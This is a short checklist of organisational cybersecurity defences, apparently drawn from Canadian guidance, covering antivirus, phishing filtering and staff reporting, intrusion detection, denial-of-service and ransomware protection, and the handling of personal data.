Use antivirus. Keep any antivirus software up to date, and consider use of a cloud-backed antivirus product that can benefit from the economies of scale this brings. Ensure that it is also capable of scanning MS Office macros.

Layer phishing defences. Detect and quarantine as many malicious email attachments and spam as possible, before they reach your end users. Multiple layers of defence will greatly cut the chances of a compromise.

Treat people as your first line of defence. Tell staff how to report suspected phishing emails, and ensure they feel confident to do so. Investigate their reports promptly and thoroughly. Never punish users for clicking phishing links or opening attachments. See CCCS Guidance: Spotting malicious email messages (ITSAP.00.100)

Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets.

Defend your systems and networks against denial of service attacks. See CCCS Guidance: https://www.publicsafety.gc.ca/cnt/rsrcs/cybr-ctr/2012/tr12-001-en.aspx

Defend your organisation from ransomware. Keep safe backups of important files, protect from malware and don’t pay the ransom – it may not get your data back. See CCCS Guidance: https://www.publicsafety.gc.ca/cnt/rsrcs/cybr-ctr/2013/in13-004-en.aspx

Make sure you are handling personal data appropriately and securely. See Privacy Commissioner guidance: https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronic-documents-act-pipeda/
